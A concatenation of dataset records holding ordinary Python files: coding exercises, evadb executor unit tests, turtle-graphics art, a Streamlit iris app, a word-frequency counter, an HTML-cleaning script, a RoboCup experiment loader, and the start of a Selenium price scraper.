\n\nprint(\"Passed.\")","repo_name":"carterkelly9/CtCI","sub_path":"arrays-and-strings/URLify.py","file_name":"URLify.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"25055104686","text":"import sys\nt = int(input())\n\nf = [0] * 10001\nf[1] = 1\nf[2] = 1\n\nfor j in range(3, 10001):\n f[j] = f[j-1] + f[j-2]\n\nfor i in range(t):\n p, q = map(int, sys.stdin.readline().split())\n print(f\"Case #{i+1}: {f[p]%q}\")\n","repo_name":"oRE-o/Problem-Solving","sub_path":"9711_피보나치.py","file_name":"9711_피보나치.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"39"} +{"seq_id":"6888404888","text":"import unittest\nfrom 
test.unit_tests.executor.utils import DummyExecutor\n\nimport numpy as np\nimport pandas as pd\nfrom mock import MagicMock\n\nfrom evadb.executor.limit_executor import LimitExecutor\nfrom evadb.executor.orderby_executor import OrderByExecutor\nfrom evadb.expression.constant_value_expression import ConstantValueExpression\nfrom evadb.expression.tuple_value_expression import TupleValueExpression\nfrom evadb.models.storage.batch import Batch\nfrom evadb.parser.types import ParserOrderBySortType\nfrom evadb.plan_nodes.limit_plan import LimitPlan\nfrom evadb.plan_nodes.orderby_plan import OrderByPlan\n\n\nclass LimitExecutorTest(unittest.TestCase):\n def test_should_return_smaller_num_rows(self):\n dfs = [\n pd.DataFrame(np.random.randint(0, 100, size=(100, 4)), columns=list(\"ABCD\"))\n for _ in range(4)\n ]\n\n batches = [Batch(frames=df) for df in dfs]\n\n limit_value = 125\n\n plan = LimitPlan(ConstantValueExpression(limit_value))\n\n limit_executor = LimitExecutor(MagicMock(), plan)\n limit_executor.append_child(DummyExecutor(batches))\n reduced_batches = list(limit_executor.exec())\n\n total_size = 0\n for batch in reduced_batches:\n total_size += len(batch)\n\n self.assertEqual(total_size, limit_value)\n\n def test_should_return_limit_greater_than_size(self):\n \"\"\"This should return the exact same data\n if the limit value is greater than what is present.\n This will also leave a warning\"\"\"\n\n dfs = [\n pd.DataFrame(np.random.randint(0, 100, size=(100, 4)), columns=list(\"ABCD\"))\n for _ in range(4)\n ]\n\n batches = [Batch(frames=df) for df in dfs]\n\n previous_total_size = 0\n for batch in batches:\n previous_total_size += len(batch)\n\n limit_value = 500\n\n plan = LimitPlan(ConstantValueExpression(limit_value))\n\n limit_executor = LimitExecutor(MagicMock(), plan)\n limit_executor.append_child(DummyExecutor(batches))\n reduced_batches = list(limit_executor.exec())\n\n after_total_size = 0\n for batch in reduced_batches:\n after_total_size += len(batch)\n\n self.assertEqual(previous_total_size, after_total_size)\n\n def test_should_return_top_frames_after_sorting(self):\n \"\"\"\n Checks if limit returns the top 2 rows from the data\n after sorting\n\n data (3 batches):\n 'A' 'B' 'C'\n [1, 1, 1]\n ----------\n [1, 5, 6]\n [4, 7, 10]\n ----------\n [2, 9, 7]\n [4, 1, 2]\n [4, 2, 4]\n \"\"\"\n\n df1 = pd.DataFrame(np.array([[1, 1, 1]]), columns=[\"A\", \"B\", \"C\"])\n df2 = pd.DataFrame(np.array([[1, 5, 6], [4, 7, 10]]), columns=[\"A\", \"B\", \"C\"])\n df3 = pd.DataFrame(\n np.array([[2, 9, 7], [4, 1, 2], [4, 2, 4]]), columns=[\"A\", \"B\", \"C\"]\n )\n\n batches = [Batch(frames=df) for df in [df1, df2, df3]]\n\n \"query: .... 
ORDER BY A ASC, B DESC limit 2\"\n\n plan = OrderByPlan(\n [\n (TupleValueExpression(col_alias=\"A\"), ParserOrderBySortType.ASC),\n (TupleValueExpression(col_alias=\"B\"), ParserOrderBySortType.DESC),\n ]\n )\n\n orderby_executor = OrderByExecutor(MagicMock(), plan)\n orderby_executor.append_child(DummyExecutor(batches))\n\n sorted_batches = list(orderby_executor.exec())\n\n limit_value = 2\n plan = LimitPlan(ConstantValueExpression(limit_value))\n limit_executor = LimitExecutor(MagicMock(), plan)\n limit_executor.append_child(DummyExecutor(sorted_batches))\n reduced_batches = list(limit_executor.exec())\n\n # merge everything into one batch\n aggregated_batch = Batch.concat(reduced_batches, copy=False)\n \"\"\"\n A B C\n 0 1 5 6\n 1 1 1 1\n \"\"\"\n\n expected_df1 = pd.DataFrame(\n np.array([[1, 5, 6], [1, 1, 1]]), columns=[\"A\", \"B\", \"C\"]\n )\n\n expected_batches = [Batch(frames=df) for df in [expected_df1]]\n\n self.assertEqual(expected_batches[0], aggregated_batch)\n","repo_name":"georgia-tech-db/evadb","sub_path":"test/unit_tests/executor/test_limit_executor.py","file_name":"test_limit_executor.py","file_ext":"py","file_size_in_byte":4169,"program_lang":"python","lang":"en","doc_type":"code","stars":2438,"dataset":"github-code","pt":"39"} +{"seq_id":"21346829393","text":"import turtle\r\nimport random\r\nimport time\r\n\r\ndef rotl(l, y=1):\r\n if len(l) == 0:\r\n return l\r\n y = y % len(l)\r\n return l[y:] + l[:y]\r\n\r\ndef rotr(l, y=1):\r\n if len(l) == 0:\r\n return l\r\n y = -y % len(l)\r\n return l[y:] + l[:y]\r\n\r\ndef dec2bin(i):\r\n str=\"{0:b}\".format(i)\r\n while len(str)<8:\r\n str='0'+str\r\n num=[0]*8\r\n for i in range(8):\r\n if str[i]=='0':\r\n num[i]=0\r\n else:\r\n num[i]=1\r\n return num\r\n\r\ndef vecadd(a,b):\r\n n=len(a)\r\n m=len(b)\r\n if n==1 and m==1:\r\n res=[a[0]+b[0]]\r\n else:\r\n if n==1:\r\n a=a*len(b)\r\n k=len(b)\r\n else:\r\n b=b*len(a)\r\n k=len(a)\r\n res=[0]*k\r\n for i in range(k):\r\n res[i]=a[i]+b[i]\r\n return res\r\n\r\ndef xshapes(aTurtle,B,size,sym):\r\n angle=360/sym\r\n aTurtle.goto(0,0)\r\n for j in range(sym):\r\n aTurtle.up()\r\n aTurtle.forward(size)\r\n aTurtle.down()\r\n X=aTurtle.xcor()\r\n Y=aTurtle.ycor()\r\n for k in range(len(B)):\r\n if B[k-1]==1:\r\n aTurtle.left(angle)\r\n else:\r\n aTurtle.right(angle)\r\n aTurtle.forward(size)\r\n aTurtle.pencolor(\"lightgray\")\r\n aTurtle.goto(X,Y)\r\n aTurtle.pencolor(\"black\")\r\n\r\ndef vecsub(a,b):\r\n n=len(a)\r\n m=len(b)\r\n if n==1 and m==1:\r\n res=[a[0]-b[0]]\r\n else:\r\n if n==1:\r\n a=a*len(b)\r\n k=len(b)\r\n else:\r\n b=b*len(a)\r\n k=len(a)\r\n res=[0]*k\r\n for i in range(k):\r\n res[i]=a[i]-b[i]\r\n return res\r\n\r\ndef vecmul(a,b):\r\n n=len(a)\r\n m=len(b)\r\n if n==1 and m==1:\r\n res=[a[0]*b[0]]\r\n else:\r\n if n==1:\r\n a=a*len(b)\r\n k=len(b)\r\n else:\r\n b=b*len(a)\r\n k=len(a)\r\n res=[0]*k\r\n for i in range(k):\r\n res[i]=a[i]*b[i]\r\n return res\r\n\r\ndef CAstep(x,rule):\r\n r=dec2bin(rule)\r\n a=vecsub([8],vecadd(rotl(x),vecmul([2],vecadd(x,vecmul([2],rotr(x))))))\r\n n=len(x)\r\n res=[0]*n\r\n for i in range(n): \r\n res[i]=(r[a[i]-1])\r\n return res\r\n\r\ndef rules(n):\r\n bestrules=[18,22,26,28,30,45,50,54,57,58,60,62,70,73,75,78,82,86,89,90,92,94,99,101,102,105,109,110,114,118,122,124,126,129,131,133,\r\n 135,137,141,145,146,147,149,150,153,154,156,157,158,161,163,165,167,169,177,178,179,181,182,186,188,190,193,195,197,\r\n 198,199,210,214,218,225,230,242,246,250]\r\n return bestrules[n]\r\n\r\ndef main():\r\n S=input(\"symmetry \") # 
Order of symmetry (>3)\r\n symmetry=int(S)\r\n R=input(\"rule \") # Cellular automaton rule(0-255)\r\n rule=rules(int(R)) \r\n G=input(\"generations \") # Number of cellular automaton generations (>0)\r\n generations=int(G)+1 \r\n L=input(\"contour length \") # Length of contour bit string\r\n length=int(L)\r\n Z=input(\"segment size \") # Length of line segments in pixels\r\n size=int(Z) \r\n#\r\n B=[0]*length # \"Standard\" initial conditions\r\n B[int(length/2)]=1\r\n#\r\n tom=turtle.Pen() \r\n tom.speed(0)\r\n turtle.bgcolor(\"white\") # Background color\r\n tom.pencolor(\"black\") # Line color\r\n tom.pensize(1) # Line width\r\n#\r\n for i in range(generations):\r\n tom.hideturtle() \r\n xshapes(tom,B,size,symmetry)\r\n tom.up()\r\n tom.goto(-300,-300)\r\n tom.down()\r\n ID=str(symmetry)+' '+str(int(R))+' '+str(i)+' '+str(length)+' '+str(size)\r\n tom.write(ID,align=\"left\",font=(\"Arial\",16,\"normal\")) \r\n filename='xfamily'+str(i)+'.ps'\r\n turtle.getscreen().getcanvas().postscript(file=filename)\r\n time.sleep(2)\r\n tom.reset()\r\n B=CAstep(B,rule) \r\nmain()\r\n","repo_name":"mohmaj/ArtOfCoding","sub_path":"Chapter 3 Coding for Art/3.3 Abstract Art/3.3.3 Geometric art with Python: adult colouring book series/xfamily.py","file_name":"xfamily.py","file_ext":"py","file_size_in_byte":3809,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"39"} +{"seq_id":"40738350911","text":"import streamlit as st\r\nfrom sklearn.datasets import load_iris\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.tree import DecisionTreeClassifier\r\n\r\n# Load the iris dataset\r\niris = load_iris()\r\nX = iris.data\r\ny = iris.target\r\n\r\n# Split the data into training and test sets\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\r\n\r\n# Train a decision tree classifier\r\nclf = DecisionTreeClassifier()\r\nclf.fit(X_train, y_train)\r\n\r\n# Create a Streamlit app\r\nst.title('Iris Species Prediction App')\r\n\r\n# Create sliders for input features\r\nsepal_length = st.slider('Sepal Length', min_value=4.0, max_value=8.0, value=5.0)\r\nsepal_width = st.slider('Sepal Width', min_value=2.0, max_value=5.0, value=3.0)\r\npetal_length = st.slider('Petal Length', min_value=1.0, max_value=7.0, value=4.0)\r\npetal_width = st.slider('Petal Width', min_value=0.1, max_value=3.0, value=1.0)\r\n\r\n# Predict the species of the iris\r\nfeatures = [[sepal_length, sepal_width, petal_length, petal_width]]\r\nprediction = clf.predict(features)\r\nst.subheader(f'The species of the iris is predicted to be: {iris.target_names[prediction][0]}')\r\n","repo_name":"gitlearner246/streamlit_test","sub_path":"iris.py","file_name":"iris.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"6370399722","text":"import re\nfrom operator import itemgetter\n\nimport jieba\nimport zhon.hanzi as chinese\nimport weibo_reader.weiboReader_LineByLine as wr\n\nre_chinese = re.compile('[%s]' % chinese.characters)\n\n\ndef jieba_tokenizer(doc):\n tokens = jieba.cut(doc)\n return [word for word in tokens\n if len(word) > 1\n and re_chinese.match(word)]\n\n\nweiboes = wr.Weibo_Reader_Line_by_Line(r\"../data/weibo.csv\")\ntexts = (item.content for item in weiboes.weibo_items())\njieba_results = (jieba_tokenizer(text) for text in texts)\ndic = dict()\nfor words in jieba_results:\n for word in words:\n dic[word] = dic.get(word, 0) + 
1\nsorted_dic = sorted(dic.items(), key=itemgetter(1), reverse=True)\nwith open(r\"..\\data\\word_frequency.txt\", \"w\", encoding=\"utf-8\") as out_f:\n for k, v in sorted_dic:\n out_f.write(\"%s:%d\\n\" % (k, v))\n","repo_name":"KindRoach/SocialOnInternet","sub_path":"weibo_reader/word_frequency.py","file_name":"word_frequency.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"4695788738","text":"#encoding:UTF-8\nimport os\nimport re\nimport sys\nfrom bs4 import BeautifulSoup\nfrom urllib import request\n\ndef getHtml(url):\n\thtmlDoc = request.urlopen(url).read()\n\thtmlDoc = htmlDoc.decode('UTF-8')\n\treturn htmlDoc\n\ndef removeScript(soup):\n\tfor script in soup.find_all('script'):\n\t\tscript.decompose()\n\treturn soup\n\ndef removeTag(soup, tagname, attribute_name, atribute_value_array):\n\tfor attribute_value in atribute_value_array:\n\t\tfor tag in soup.findAll(tagname, {attribute_name : attribute_value}):\n\t\t\ttag.decompose()\n\treturn soup\n\ndef removeSegmentFaultTag(soup):\n\tsoup = removeTag(soup, \"div\", \"class\",\n\t\t\t[\"col-md-4\", \"clearfix mt10\", \"widget-box\", \"recommend-post\", \"text-center mt10\", \"global-navTags\",\n\t\t\t\"post-topheader custom-\", \"global-nav sf-header\", \"app-promotion-bar\", \"widget-comments hidden\", \"modal\",\n\t\t\t\"hidden widget-register widget-welcome-question mt20 hidden-xs widget-welcome widget-register-slideUp\",\n\t\t\t\"modal widget-911\", \"col-xs-12 col-md-3 side\"])\n\tsoup = removeTag(soup, \"img\", \"id\", ['icon4weChat', 'icon4weChat'])\n\tsoup = removeTag(soup, \"div\", \"id\", [\"fixedTools\"])\n\tsoup = removeTag(soup, \"footer\", \"id\", [\"footer\"])\n\tsoup = removeTag(soup, \"h2\", \"class\", ['h4 post-comment-title'])\n\treturn soup\n\ndef removeJobboleTag(soup):\n\tnav_classes = [\"menu-nav\", \"grid-12 menu-nav\"]\n\tfor navclass in nav_classes:\n\t\tnav = soup.find(\"nav\", {\"class\": navclass})\n\t\tif nav is not None:\n\t\t\tnav.decompose()\n\tdiv_classes = [\"header-wrapper\", \"grid-4\", \"wp_rp_wrap wp_rp_plain\",\n\t\"dot-box center-align\", \"author-bio-info\", \"navigation margin-20\",\n\t\"post-adds\", \"comments\", \"entry-meta\", \"copyright-area\", \"crayon-toolbar\", \"crayon-main\"]\n\tfor divclass in div_classes:\n\t\tfor div in soup.findAll(\"div\", {\"class\": divclass}):\n\t\t\tdiv.decompose()\n\tdiv = soup.find(\"div\", {\"id\": \"full-btm\"})\n\tdiv.decompose()\n\tdiv = soup.find(\"div\", {\"id\": \"full-top\"})\n\tif div is not None:\n\t\tdiv.decompose()\n\tdiv = soup.find(\"div\", {\"id\": \"author-bio\"})\n\tif div is not None:\n\t\tdiv.decompose()\n\tdiv = soup.find(\"div\", {\"id\": \"rewardbox\"})\n\tif div is not None:\n\t\tdiv.decompose()\n\tdiv = soup.find(\"div\", {\"id\": \"breadcrumb\"})\n\tdiv.decompose()\n\tdiv = soup.find(\"div\", {\"style\": \"text-align: left;\"})\n\tdiv.decompose()\n\tblockquote = soup.find(\"blockquote\", {\"class\": \"rewards\"})\n\tif blockquote is not None:\n\t\tblockquote.decompose()\n\tfooter = soup.find(\"footer\")\n\tfooter.decompose()\n\tstyle = soup.find(\"style\")\n\tstyle.decompose()\n\tfor textwidget in soup.findAll(\"div\", {\"class\": \"textwidget\"}):\n\t\ttextwidget.decompose()\n\tfor meta in soup.findAll('link'):\n\t\tmeta.decompose()\n\treturn soup\n\ndef removeInfoQCN(soup):\n\tdiv_ides = [\"topInfo\", \"header\", \"contentRatingWidget\", \"comment_here\", \"footer\",\n\t\"forceUpdate_inline\", \"replyPopup\", 
\"id_geo_banner\", \"forceProfileUpdateArea\", \"overlay_comments\",\n\t\"editCommentPopup\", \"messagePopup\", \"responseContent\"]\n\tfor divid in div_ides:\n\t\tfor div in soup.findAll(\"div\", {\"id\": divid}):\n\t\t\tdiv.decompose()\n\tdiv_classes = [\"related_sponsors visible stacked\", \"random_links\", \"clear\", \"comments\",\n\t\"all_comments\", \"newsletter \", \"bottomContent\", \"login_overlay\", \"article_page_right\",\n\t\"related_sponsors relEdRelRes\", \"intbt\", \"related_sponsors wholething\"]\n\tfor divclass in div_classes:\n\t\tfor div in soup.findAll(\"div\", {\"class\": divclass}):\n\t\t\tdiv.decompose()\n\tspan = soup.find(\"span\", {\"class\": \"author_general\"})\n\tif span is not None:\n\t\tspan.decompose()\n\ta = soup.find(\"a\", {\"class\": \"comments_like\"})\n\tif a is not None:\n\t\ta.decompose()\n\tul = soup.find(\"ul\", {\"class\": \"sh_t\"})\n\tif ul is not None:\n\t\tul.decompose()\n\tfor meta in soup.findAll('link'):\n\t\tmeta.decompose()\n\treturn soup\n\ndef removeITEBlog(soup):\n\tdiv_classes = [\"navbar\", \"banner banner-site\", \"speedbar\", \"tongji\", \"QRcode\", \"comt-title\", \"relates\",\n\t\"widget widget_text\", \"no_webshot\", \"article-social\", \"related_top\", \"banner banner-related\", \"banner banner-comment\",\n\t\"announcement\", \"meta\", \"no_bullets\"\n\t]\n\tfor divclass in div_classes:\n\t\tfor div in soup.findAll(\"div\", {\"class\": divclass}):\n\t\t\tdiv.decompose()\n\tdiv_ides = [\"postcomments\"]\n\tfor divid in div_ides:\n\t\tfor div in soup.findAll(\"div\", {\"id\": divid}):\n\t\t\tdiv.decompose()\n\tfor header in soup.findAll(\"header\", {\"class\": \"header\"}):\n\t\theader.decompose()\n\taside = soup.find(\"aside\")\n\tif aside is not None:\n\t\taside.decompose()\n\tnav = soup.find(\"nav\")\n\tif nav is not None:\n\t\tnav.decompose()\n\tspan = soup.find(\"span\", {\"style\": \"margin-top: 15px; color:red; display:block;text-align:center;\"})\n\tif span is not None:\n\t\tspan.decompose()\n\tfor footer in soup.findAll(\"footer\"):\n\t\tfooter.decompose()\n\treturn soup\n\ndef removeTag(soup, tagname, attribute_name, atribute_value_array):\n\tfor attribute_value in atribute_value_array:\n\t\tfor tag in soup.findAll(tagname, {attribute_name : attribute_value}):\n\t\t\ttag.decompose()\n\treturn soup\n\ndef removeIBMTag(soup):\n\tsoup = removeTag(soup, \"div\", \"class\", \n\t\t[\"dw-home-band\", \"ibm-access\", \"ibm-col-6-2 dw-toc-margin\", \"dw-footer-columns\", \"ibm-col-6-2\",\n\t \"ibm-container ibm-alternate ibm-buttons-last\", \"ibm-common-overlay\", \"ibm-no-print\", \"metavalue\"])\n\tsoup = removeTag(soup, \"div\", \"id\", \n\t\t[\"dw-masthead-top-row\", \"ibm-masthead\", \"ibm-footer-module-dwwrapper\", \"ibm-footer\", \"ibm-metrics\"])\n\tsoup = removeTag(soup, \"ul\", \"class\", [\"ibm-portrait-module-list\"])\n\tsoup = removeTag(soup, \"ul\", \"id\", [\"ibm-navigation-trail\"])\n\tsoup = removeTag(soup, \"h2\", \"class\", [\"ibm-alternate-rule ibm-no-print\"])\n\tsoup = removeTag(soup, \"p\", \"class\", [\"ibm-ind-link ibm-back-to-top\"])\n\treturn soup\n\ndef removeFreeBufTag(soup):\n\tsoup = removeTag(soup, \"div\", \"class\",\n\t\t[\"panel panel-default\", \"commentshow\", \"comment-list\", \"panel panel-default rec-spe\"])\n\treturn soup\n\nif len(sys.argv) < 2:\n sys.stderr.write('Usage: clean [url] ')\n sys.exit(1)\n\nurl = sys.argv[1]\nhtmlDoc = getHtml(url)\nsoup = BeautifulSoup(htmlDoc, \"lxml\")\nsoup = removeScript(soup)\nif \"segmentfault.com\" in url:\n\tsoup = removeSegmentFaultTag(soup)\nelif 
\"jobbole.com\" in url:\n\tsoup = removeJobboleTag(soup)\nelif \"www.infoq.com/cn\" in url:\n\tsoup = removeInfoQCN(soup)\nelif \"iteblog\" in url:\n\tsoup = removeITEBlog(soup)\nelif \"www.ibm.com/developerworks\" in url:\n\tsoup = removeIBMTag(soup)\nelif \"www.freebuf.com\" in url:\n\tsoup = removeFreeBufTag(soup)\n\nhtml = soup.prettify(\"utf-8\")\n\nwith open(\"output.html\", \"wb\") as file:\n file.write(html)\n","repo_name":"HungMingWu/CleanerWebsite","sub_path":"clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":6298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"12016187860","text":"import os\nimport glob\nimport json\nimport pickle\nimport numpy as np\nimport pandas as pd\nfrom typing import List\nfrom training.utils.reader import DataReader, ModelTrainingData\n\n\ndef get_run_number(run_dir_path: str) -> int:\n return int(run_dir_path.split(\"_\")[-1])\n\n\ndef get_episode_reward(episode_data: List[ModelTrainingData]):\n return np.sum([step.env_data.reward for step in episode_data])\n\n\ndef get_episode_passes(episode_data: List[ModelTrainingData]):\n return np.sum([step.env_data.n_balls_passed for step in episode_data])\n\n\ndef get_action_distribution(run_data_list: List[List[ModelTrainingData]]):\n total_samples = 0\n dist = np.zeros(run_data_list[0][0].model_output.action_space_size)\n for d in run_data_list:\n total_samples += len(d)\n for t_step in d:\n dist[t_step.model_output.role] += 1\n dist = dist/total_samples\n return dist\n\n\ndef total_times_over_runs(times: pd.DataFrame, key: str) -> pd.DataFrame:\n totals = pd.DataFrame()\n times = times.reset_index(drop=True)\n for i, pd_index in enumerate(times.index):\n totals = totals.append([times[key][:i].sum() + times[key][pd_index]], ignore_index=True)\n times[key + \" over runs\"] = totals\n return times\n\n\ndef get_time_spent_simulating_training_per_run(exp_data: pd.DataFrame):\n return total_times_over_runs(exp_data[\"simulated training data time per epoch\"])\n\n\ndef get_total_time_over_runs(exp_data: pd.DataFrame, key: str) -> pd.DataFrame:\n new_data = pd.DataFrame()\n for t_id in exp_data[\"turtle\"].unique():\n for name in exp_data[\"name\"].unique():\n set_with_comp_data = exp_data[(exp_data['name'] == name) & (exp_data['turtle'] == t_id)]\n set_with_comp_data = total_times_over_runs(set_with_comp_data, key)\n new_data = new_data.append(set_with_comp_data, ignore_index=True)\n return new_data\n\n\ndef get_run_turtle_data(data_dir_path: str, turtle_id: int) -> dict:\n run_data = []\n reader = DataReader()\n search_string = data_dir_path + \"/model_data*t\" + str(turtle_id) + \"*.mb\"\n files = glob.glob(search_string)\n if len(files) > 0:\n for index, file in enumerate(files):\n run_data.append(reader.read_data(file))\n action_distribution = get_action_distribution(run_data)\n\n return {\"mean epoch reward\": np.mean([get_episode_reward(episode) for episode in run_data]),\n \"quantile 1st epoch reward\": np.quantile([get_episode_reward(episode) for episode in run_data], 0.25),\n \"quantile 3rd epoch reward\": np.quantile([get_episode_reward(episode) for episode in run_data], 0.75),\n \"mean epoch passes\": np.mean([get_episode_passes(episode) for episode in run_data]),\n \"quantile 1st epoch passes\": np.quantile([get_episode_passes(episode) for episode in run_data], 0.25),\n \"quantile 3rd epoch passes\": np.quantile([get_episode_passes(episode) for episode in run_data], 0.75),\n \"action pass\": action_distribution[0],\n 
\"action receive\": action_distribution[1],\n \"action move\": action_distribution[2],\n \"action intercept\": action_distribution[3]}\n\n\ndef get_computation_time(run_dir_path: str) -> dict:\n file_path = os.path.join(run_dir_path,\n \"models/training/time_per_training_epoch.timepickle\")\n if os.path.exists(file_path):\n with open(file_path, \"rb\") as file:\n epoch_training_times = pickle.load(file)\n return {\"computation time\": np.sum([np.round(time.microseconds)/1e6 for time in epoch_training_times])}\n return {\"computation time\": 0}\n\n\ndef get_run_meta_data(run_dir_path: str) -> dict:\n with open(os.path.join(run_dir_path, \"config/config.json\"), 'r') as file:\n meta_data_file: dict = json.load(file)\n simulated_epoch_time_for_training = meta_data_file[\"inference\"][\"episodes\"] * meta_data_file[\"inference\"][\"episode_time\"]\n meta_data = {\"name\": meta_data_file[\"name\"],\n \"algorithm\": meta_data_file[\"algorithm\"],\n \"evaluation episodes per epoch\": meta_data_file[\"evaluation\"][\"episodes\"],\n \"evaluation time per episode\": meta_data_file[\"evaluation\"][\"episode_time\"],\n \"training data episodes per epoch\": meta_data_file[\"inference\"][\"episodes\"],\n \"training data time per episode\": meta_data_file[\"inference\"][\"episode_time\"],\n \"simulated training time\": simulated_epoch_time_for_training,\n \"simulated training frames\": round(simulated_epoch_time_for_training*100)}\n\n if meta_data_file[\"algorithm\"] == \"simple_pg\":\n meta_data[\"learning rate\"] = meta_data_file[\"algorithm_settings\"][\"simple_pg\"][\"learning_rate\"]\n meta_data[\"network sizes\"] = meta_data_file[\"algorithm_settings\"][\"simple_pg\"][\"network_hidden_sizes\"]\n elif meta_data_file[\"algorithm\"] == \"vpg\":\n meta_data[\"learning rate\"] = meta_data_file[\"algorithm_settings\"][\"vpg\"][\"policy_learning_rate\"]\n meta_data[\"network sizes\"] = meta_data_file[\"algorithm_settings\"][\"vpg\"][\"network_hidden_sizes\"]\n elif meta_data_file[\"algorithm\"] == \"rule_based\" or meta_data_file[\"algorithm\"] == \"uniform_sampling\":\n meta_data[\"learning rate\"] = None\n meta_data[\"network sizes\"] = None\n meta_data[\"training data time per episode\"] = 0\n meta_data[\"simulated training time\"] = 0\n return meta_data\n\n\ndef get_run_data(run_dir_path: str, turtle_id: int) -> dict:\n run_data_dict = {\"run\": get_run_number(run_dir_path),\n \"turtle\": turtle_id,\n \"training time\": None}\n run_data_dict.update(get_run_meta_data(run_dir_path))\n run_data_dict.update(get_run_turtle_data(os.path.join(run_dir_path, \"evaluation\"), turtle_id))\n run_data_dict.update(get_computation_time(run_dir_path))\n return run_data_dict\n\n\ndef get_experiment_data(experiment_dir_path: str) -> pd.DataFrame:\n experiment_data = pd.DataFrame()\n for t_id in [2, 3]:\n dirs = [d for d in os.listdir(experiment_dir_path)\n if os.path.isdir(os.path.join(experiment_dir_path, d))]\n for run_dir in dirs:\n if not run_dir == \"figures\":\n run_data = get_run_data(\n os.path.join(experiment_dir_path, run_dir), t_id)\n experiment_data = experiment_data.append(run_data, ignore_index=True)\n experiment_data = get_total_time_over_runs(\n experiment_data.sort_values(by=[\"name\", \"turtle\", \"run\"]), 'computation time')\n experiment_data = get_total_time_over_runs(\n experiment_data.sort_values(by=[\"name\", \"turtle\", \"run\"]), 'simulated training time')\n experiment_data = get_total_time_over_runs(\n experiment_data.sort_values(by=[\"name\", \"turtle\", \"run\"]), 'simulated training 
frames')\n experiment_data[\"training time\"] = experiment_data[\"computation time\"] \\\n + experiment_data[\"simulated training time\"]\n experiment_data[\"training time over runs\"] = experiment_data[\"computation time over runs\"] \\\n + experiment_data[\"simulated training time over runs\"]\n return experiment_data\n\n\ndef get_experiments_data(experiment_dir_paths: List[str]) -> pd.DataFrame:\n experiment_data = pd.DataFrame()\n for dir_path in experiment_dir_paths:\n experiment_data = experiment_data.append(get_experiment_data(dir_path))\n return experiment_data\n\n\nif __name__ == \"__main__\":\n test = get_experiment_data(\"/home/robocup/svn/trunk/src/Turtle2/Strategy/src/STP/strategy_learner/experiments/results/11-nov-spg-1\")\n print(test)\n","repo_name":"mickeybeurskens/strategy-learner","sub_path":"evaluation/load_experiments.py","file_name":"load_experiments.py","file_ext":"py","file_size_in_byte":7644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"9939402889","text":"######################################################\n# Imports\n######################################################\n\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport jellyfish\n\nfrom flask import Flask, render_template, request\nimport time\n\nimport yagmail\nimport os\n\n\nservice = Service('path') # path to chromedriver for local machine\n\n######################################################\n# web scraping functions\n######################################################\n\ndef clean_price_rtv(text):\n return float(text.split(\" zł\")[0].replace(' ', ''))\n\ndef clean_price_media(text):\n return float(text.replace('\\u202f', ''))\n\n# function below extracts the minimum price from prices lower than maximum price stated in the GUI\n# the similarity ratio of offers and searched product has to be bigger than minimum ratio\n# we are taking into account two highest ratios to avoid rejecting similar item (e.g. 
just different color) with lower price\n\ndef get_min_price(ratio_list, price_list, threshold, ratio_min):\n if len(ratio_list) > 0 and len(price_list) > 0:\n help_index = [index for index, item in enumerate(price_list) if item <= threshold]\n if help_index != []:\n index = [index for index, item in enumerate(ratio_list) if item >= sorted(ratio_list)[-2] and item > ratio_min and index in help_index]\n min_price = min([price_list[i] for i in index])\n return min_price\n\ndef get_driver(url):\n options = webdriver.ChromeOptions()\n options.add_argument(\"disable-infobars\")\n options.add_argument(\"start-maximized\")\n options.add_argument(\"disable-dev-shm-usage\")\n options.add_argument(\"no-sandbox\")\n options.add_argument(\"--headless=new\")\n options.add_experimental_option(\"excludeSwitches\", [\"enable-automation\"])\n options.add_argument(\"disable-blink-features=AutomationControlled\")\n\n driver = webdriver.Chrome(service=service, options=options)\n driver.get(url)\n return driver\n\n\ndef rtv_get_results(text, url, threshold):\n driver = get_driver(url)\n WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.ID, 'onetrust-accept-btn-handler'))).click()\n\n search_bar = driver.find_element(By.XPATH,\n '/html/body/ems-root/eui-root/eui-dropdown-host/div[2]/ems-euro-mobile/ems-euro-mobile-shared-feature-header-wrapper/ems-euro-mobile-shared-feature-header/div/ems-header/div[2]/div/div/div[2]/ems-euro-mobile-shared-feature-search-container/div/div/ems-search-input/ems-text-input/label/div/div/div[1]/input')\n\n search_bar.click()\n search_bar.send_keys(text + Keys.RETURN)\n\n expected = (By.CLASS_NAME, 'box-medium__link')\n WebDriverWait(driver, 10).until(EC.presence_of_element_located(expected))\n offers = driver.find_elements(By.CLASS_NAME, \"box-medium__link\")\n prices = driver.find_elements(By.CLASS_NAME, \"price__value\")\n\n offer_list = []\n ratio_list = []\n link_list = []\n\n for offer in offers:\n offer_list.append(offer.text)\n link_list.append(offer.get_attribute('href'))\n ratio_list.append(jellyfish.jaro_winkler_similarity(text, offer.text))\n\n price_list = []\n\n for price in prices:\n if not \",\" in price.text and not price.text == \"\":\n price_list.append(clean_price_rtv(price.text))\n\n min_price = get_min_price(ratio_list, price_list, threshold, 0.5)\n\n driver.quit()\n\n if offer_list == []:\n return \"No offers found\"\n else:\n if min_price:\n price_index = price_list.index(min_price)\n return offer_list[price_index], min_price, link_list[price_index]\n else:\n return \"Prices too high\"\n\n\ndef media_get_results(text, url, threshold):\n driver = get_driver(url)\n 